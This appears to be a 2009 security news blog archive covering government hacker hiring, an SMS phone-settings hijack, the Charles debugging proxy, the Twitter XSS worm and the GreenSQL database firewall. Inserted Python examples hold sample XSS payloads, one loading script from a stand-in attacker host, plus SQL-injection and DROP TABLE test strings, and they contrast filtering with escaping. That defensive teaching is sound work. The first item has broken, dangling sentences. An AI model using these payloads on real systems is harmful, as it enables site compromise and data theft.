Apr 20 2009

Wanted: Computer Hackers – To Help Government

WASHINGTON – Wanted: Computer hackers.

Federal authorities aren’t looking to prosecute them, but to pay them to secure the nation’s networks.

General Dynamics Information Technology put out an ad last month on behalf of the Homeland Security Department seeking someone who could “think like the bad guy.” Applicants, it said, must understand hackers’ tools and tactics and be able to analyze Internet traffic and identify vulnerabilities in the federal systems.

With warnings that the U.S. is ill-prepared for a cyberattack, the White House conducted a 60-day study of how the government can better manage and use technology to protect everything from the electrical grid and stock markets to tax data, airline flight systems, and nuclear launch codes.

President Barack Obama appointed a former Bush administration aide, Melissa Hathaway, to head the effort, and her report was delivered Friday, the White House said.

U.S. computer networks, including those at the Pentagon and other federal agencies, are under persistent attack, ranging from nuisance hacking to more nefarious assaults, possibly from other nations, such as China.

Just last week, spies had hacked into the U.S. electric grid and left behind computer programs that would let them disrupt service. The intrusions were discovered after electric companies gave the government permission to audit their systems.

Adm. Mike Mullen, chairman of the Joint Chiefs of Staff. Pentagon officials say they spent more than $100 million in the last six months responding to and repairing damage from cyberattacks and other computer network problems.

Short said the $60 million, four-year contract with US-CERT uses the ethical hackers to analyze threats to the government’s computer systems and develop ways to reduce vulnerabilities.

Source: Yahoo News

Apr 18 2009

Hijacking Mobile Phone Data

Researchers claim to be able to hijack cell-phone data connections.

In a presentation at Black Hat Europe, a computer-security conference in Amsterdam, a group of researchers claimed to have found a way to hijack the data sent to and from mobile phones. The researchers say that the attack might be used to glean passwords or to inject malicious software onto a device.

The new attack relies on a protocol that allows mobile operators to send a device the proper settings for data transfer via text message, according to Roberto Gassira, Cristofaro Mune, and Roberto Piccirillo, security researchers for Mobile Security Lab [www.mseclab.com], a consulting firm based in Italy. By forging this type of text message, an attacker can, within the rules of the protocol, supply his own settings to the victim’s device. This would allow him to, for example, reroute data sent from the phone through a server that he controls. The researchers say that the technique should work on any handset that supports the protocol, as long as the attacker knows which network the victim belongs to and the network does not block this kind of message.

Some trickery is required to make the attack work, however. Ordinarily, to transfer settings to a device remotely, a mobile operator will first send a text message containing a PIN code. The operator will then send the message to reconfigure the phone. In order to install the new settings, the user must first enter the PIN.

So an attacker would need to convince a victim to enter a PIN and accept the malicious settings sent to the phone. But Gassira, Mune and Piccirillo believe that this shouldn’t be too difficult. The attacker could send text messages from a name such as “service provider” or “message configuration,” suggesting that changes to the device’s settings are needed due to a network error. For many handsets, they say, the results of the configuration aren’t shown to the user, giving the victim little chance to notice that anything is amiss.

Source: Technology Review

Apr 18 2009

Charles Web Debugging Proxy

Charles is an HTTP proxy / HTTP monitor / Reverse Proxy that enables a developer to view all of the HTTP traffic between their machine and the Internet. This includes requests, responses and the HTTP headers (which contain the cookies and caching information).

Charles can act as a man-in-the-middle for HTTP/SSL communication, enabling you to debug the content of your HTTPS sessions.

Charles simulates modem speeds by effectively throttling your bandwidth and introducing latency, so that you can experience an entire website as a modem user might (bandwidth simulator).

Charles is especially useful for Adobe Flash developers as you can view the contents of LoadVariables, LoadMovie and XML loads. Charles also has native support for Flash Remoting (AMF0 and AMF3).

Charles is also useful for XML development in web browsers, such as AJAX (Asynchronous JavaScript and XML) and XMLHTTP, as it enables you to see the actual XML that is flowing between the client and the server. Charles natively supports JSON, JSON-RPC and SOAP, displaying each in a simplified tree format for easy viewing and debugging.

Charles will autoconfigure your browser’s proxy settings on the following browsers:

* IE (Windows system proxy settings)
* Firefox
* Safari (Mac OS X or Windows system proxy settings)

Supported Platforms:
* Windows
* Mac OS X
* Linux/Unix

Latest Release: Version 3.3.1

Download: http://www.charlesproxy.com/download.php

Apr 14 2009

Twitter Attacked by Powerful Worm

Twitter, the 3rd biggest social network after Facebook and Myspace, was hit over the weekend by powerful, self-replicating attacks that caused people to flood the micro-blogging site with tens of thousands of messages simply by viewing booby-trapped user profiles.

The worm attacks began early Saturday morning and were the result of XSS, or cross-site scripting, bugs in the Twitter service. They caused those who viewed the profiles of infected users to post tweets promoting a site called StalkDaily.com. Victim profiles were then altered to include malicious JavaScript that infected new marks. Over the next 36 hours, at least three similar worms made the rounds, causing Twitter administrators to delete more than 10,000 tweets.

Twitter’s inability to quickly contain the mess prompted some security watchers to criticize Twitter for not being more on top of it. According to this postmortem from the Dcortesi blog, the attacks exploited gaping holes that allowed users to insert tags in the URL field of Twitter users’ profile pages that loaded malicious JavaScript from third-party web servers.

As is frequently the case with XSS-based attacks, the worm was unable to prey on those using the NoScript add-on for the Firefox browser.

Twitter’s security team was able to block the attack for a while, but a new assault that made use of “mildly obfuscated” code soon defeated the countermeasure, raising the possibility that the countermeasure was based on detecting attack signatures rather than on fixing the underlying bug that made the XSS vulnerability possible in the first place.
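The article does not reproduce the worm's code. As an added example (not from the article, the Dcortesi postmortem, or Twitter), the following Python shows why a signature-based block is brittle while output encoding plus a scheme allowlist is not: a profile URL field pasted raw into an attribute, a filter that matches one literal pattern, and a hardened renderer, checked against constructed inputs. The host attacker.invalid and all sample values are placeholders.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed inputs for a profile "homepage URL" field; generic placeholders,
# not the 2009 worm's payload (the article does not reproduce it).
SAMPLE_URLS = [
    "http://example.com/",
    '"><script src="http://attacker.invalid/w.js"></script>',  # plain
    '"><ScRiPt src="http://attacker.invalid/w.js"></ScRiPt>',  # mildly obfuscated
    "javascript:alert(1)",                                     # no tag needed
]

def render_vulnerable(url):
    # The 'before': the stored value is pasted straight into an attribute.
    return '<a href="%s">homepage</a>' % url

def signature_filter(url):
    # Signature-style countermeasure: reject one literal pattern, nothing else.
    return "" if "<script" in url else url

def render_hardened(url):
    # Allowlist the scheme (rejects javascript:), require a host, then HTML-escape.
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return "<a>homepage</a>"
    return '<a href="%s">homepage</a>' % html.escape(url, quote=True)

class _Audit(HTMLParser):  # records start tags and hrefs as a browser would see them
    def __init__(self):
        super().__init__()
        self.tags, self.hrefs = [], []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.hrefs += [v or "" for k, v in attrs if k == "href"]

def is_safe(rendered):
    # Safe: the only element is our anchor and every href is http(s) or schemeless.
    p = _Audit()
    p.feed(rendered)
    p.close()
    return p.tags == ["a"] and all(
        urlsplit(h).scheme in ("", "http", "https") for h in p.hrefs)

def evaluate():
    # For each sample: (raw paste, signature filter then paste, hardened renderer).
    return {u: (is_safe(render_vulnerable(u)),
                is_safe(render_vulnerable(signature_filter(u))),
                is_safe(render_hardened(u))) for u in SAMPLE_URLS}
```

The filter stops only the exact lower-case pattern; the case-changed variant and the javascript: URL both get through it, while the hardened renderer is safe on every input.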

Source: The Register

Apr 10 2009

GreenSQL – SQL Database Firewall

GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy and has built-in support for MySQL. The logic is based on evaluation of SQL commands using a risk scoring matrix as well as blocking known DB administrative commands (DROP, CREATE, etc.). GreenSQL is distributed under the GPL license.

GreenSQL-FW 1.0.0 Released:
The GreenSQL team is ready to present a new version of GreenSQL. GreenSQL intercepts SQL commands being sent to MySQL, checks them, and then either halts the query or passes it on to MySQL proper. It then returns the query results to the calling application. Currently only the MySQL database is supported. This release includes a new version of the firewall and a management application.
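The intercept, score, then halt-or-pass flow described above, as an added example that is not GreenSQL's own code: a small risk-scoring evaluator for incoming MySQL statements with an outright block on administrative commands. The rules, weights, threshold and sample queries are all constructed assumptions for illustration; GreenSQL's real risk matrix is not on this page.

```python
import re

# Constructed scoring rules standing in for a risk matrix. The weights and
# patterns are assumptions for illustration, not GreenSQL's own ruleset.
RISK_RULES = [
    (r"\bor\b\s+(\S+)\s*=\s*\1(?!\w)", 3, "tautology after OR (e.g. 1=1)"),
    (r"\bunion\b\s+(all\s+)?select\b", 3, "UNION SELECT appended to query"),
    (r"\bsleep\s*\(|\bbenchmark\s*\(", 3, "time-delay function"),
    (r"--|/\*|#", 2, "comment marker (can truncate the real query)"),
    (r";\s*\w", 2, "stacked statement"),
]
# Administrative commands an application account should never issue through
# the proxy; these are blocked outright regardless of score.
ADMIN_COMMANDS = {"drop", "create", "alter", "grant", "truncate"}

def evaluate_query(sql, threshold=3):
    """Return {'verdict': 'pass'|'block', 'score': int, 'reasons': [...]}."""
    text = sql.strip().lower()
    first = text.split(None, 1)[0] if text else ""
    if first in ADMIN_COMMANDS:
        return {"verdict": "block", "score": threshold,
                "reasons": ["administrative command: " + first.upper()]}
    score, reasons = 0, []
    for pattern, weight, why in RISK_RULES:
        if re.search(pattern, text):
            score += weight
            reasons.append(why)
    verdict = "block" if score >= threshold else "pass"
    return {"verdict": verdict, "score": score, "reasons": reasons}

# Constructed sample statements as an application might send them to MySQL.
SAMPLES = {
    "benign": "SELECT name FROM users WHERE id = 42",
    "tautology": "SELECT name FROM users WHERE id = '' OR '1'='1' -- '",
    "admin": "DROP TABLE users",
    "literal_comment": "SELECT id FROM orders WHERE note = 'a -- b'",
}

def run_samples():
    return {name: evaluate_query(q)["verdict"] for name, q in SAMPLES.items()}
```

The literal_comment sample shows why a score rather than a single pattern matters: a comment marker inside a string literal earns points but, on its own, stays under the threshold.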

This is a major application release geared towards application stability, ease of use, performance increase and elimination of bugs.

This release includes a number of pre-built packages for popular operating systems: CentOS, Fedora, Mandriva, Red Hat, openSUSE, Ubuntu, and Debian.

List of changes:
1. Code optimization.
2. Fixed a number of bugs related to networking connectivity.
3. Extended support for specific MySQL SQL commands.
4. Ease of use.

New management version is numbered 0.5.0
New firewall version is numbered 1.0.0

Home: http://www.greensql.net

Download: http://www.greensql.net/download